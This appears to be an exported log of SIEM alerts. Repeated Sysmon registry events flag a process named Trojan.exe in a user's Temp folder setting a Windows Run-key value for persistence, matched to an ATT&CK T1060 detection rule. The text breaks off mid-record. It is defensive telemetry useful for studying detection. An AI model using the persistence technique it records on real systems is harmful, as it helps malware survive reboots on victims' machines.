HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:59.983585100Z"",""eventRecordID"":""1084"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:59.948\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:59.948"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:12.087",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:58.852 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.855332400Z"",""eventRecordID"":""1083"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:58.852\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:58.852"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:10.960",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:57.836 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:57.846833200Z"",""eventRecordID"":""1082"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:57.836\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:57.836"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:09.915",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:56.790 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:56.791627400Z"",""eventRecordID"":""1081"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:56.790\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:56.790"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:08.898",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:55.774 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:55.777092100Z"",""eventRecordID"":""1080"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:55.774\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:55.774"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:07.945",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:54.758 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:54.762204800Z"",""eventRecordID"":""1079"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:54.758\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:54.758"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:07.933",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:53.727 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:53.732610900Z"",""eventRecordID"":""1078"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:53.727\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:53.727"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:07.884",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:52.696 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:52.701510400Z"",""eventRecordID"":""1077"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:52.696\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:52.696"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:04.790",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:51.665 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:51.668597100Z"",""eventRecordID"":""1076"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:51.665\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:51.665"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:03.789",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:50.649 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:50.674907300Z"",""eventRecordID"":""1075"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:50.649\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:50.649"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:02.742",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:49.633 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:49.642767700Z"",""eventRecordID"":""1074"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:49.633\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:49.633"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:01.742",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:48.602 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 